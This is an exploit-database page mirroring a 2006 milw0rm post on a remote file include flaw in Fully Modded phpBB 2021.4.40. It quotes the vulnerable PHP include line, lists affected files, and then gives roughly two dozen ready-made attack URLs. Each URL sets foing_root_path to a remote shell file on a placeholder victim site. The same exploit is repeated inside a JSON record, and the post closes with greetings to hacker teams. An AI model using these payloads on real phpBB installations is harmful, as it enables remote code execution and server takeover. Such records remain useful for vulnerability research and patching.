Search...

Fully Modded phpBB <= 2021.4.40 Multiple File Include Vulnerabilities

2014-07-01T00:00:00

ID SSV:64159
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##############################################################
Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)

##############################################################

Source Code:
   http://phpbbfm.net/support/index_fm.php
   http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz
###################################################

Vulnerable Code:_
include(&#39;includes/common.php&#39;);
$phpbb_root_path = $foing_root_path . $phpbb_root_path;
In
./faq.php
./index.php
./list.php
./login.php
./playlist.php
./song.php
./gen_m3u.php
./view_artist.php
./view_song.php
./flash/set_na.php
./flash/initialise.php
./flash/get_song.php
./includes/common.php
./admin/nav.php
./admin/main.php
./admin/list_artists.php
./admin/index.php
./admin/genres.php
./admin/edit_artist.php
./admin/edit_album.php
./admin/config.php
./admin/admin_status.php

###################################################

Exploit :
http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?
###################################################

Discoverd By :  020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  &#62; WwW.DwRaT.CoM & WwW.Tryag.CoM & WwW.Xp020.CoM
###################################################

# milw0rm.com [2006-10-23]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-64159", "status": "cve,poc", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Fully Modded phpBB <= 2021.4.40 Multiple File Include Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64159", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2014-07-01T00:00:00", "sourceData": "\n ##############################################################\r\nFully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)\r\n\r\n##############################################################\r\n\r\nSource Code:\r\n http://phpbbfm.net/support/index_fm.php\r\n http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz\r\n###################################################\r\n\r\nVulnerable Code:_\r\ninclude('includes/common.php');\r\n$phpbb_root_path = $foing_root_path . $phpbb_root_path;\r\nIn\r\n./faq.php\r\n./index.php\r\n./list.php\r\n./login.php\r\n./playlist.php\r\n./song.php\r\n./gen_m3u.php\r\n./view_artist.php\r\n./view_song.php\r\n./flash/set_na.php\r\n./flash/initialise.php\r\n./flash/get_song.php\r\n./includes/common.php\r\n./admin/nav.php\r\n./admin/main.php\r\n./admin/list_artists.php\r\n./admin/index.php\r\n./admin/genres.php\r\n./admin/edit_artist.php\r\n./admin/edit_album.php\r\n./admin/config.php\r\n./admin/admin_status.php\r\n\r\n###################################################\r\n\r\nExploit :\r\nhttp://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?\r\nhttp://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?\r\n###################################################\r\n\r\nDiscoverd By : 020\r\n###################################################\r\n\r\nSpecial Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team > WwW.DwRaT.CoM & WwW.Tryag.CoM & WwW.Xp020.CoM\r\n###################################################\r\n\r\n# milw0rm.com [2006-10-23]\r\n\n ", "id": "SSV:64159", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T15:58:08", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2017-11-19T15:58:08"}, "dependencies": {"references": [], "modified": "2017-11-19T15:58:08"}, "vulnersScore": 0.2}, "objectVersion": "1.4", "references": []}

Fully Modded phpBB &lt;= 2021.4.40 Multiple File Include Vulnerabilities

Description

No description provided by source.

Fully Modded phpBB <= 2021.4.40 Multiple File Include Vulnerabilities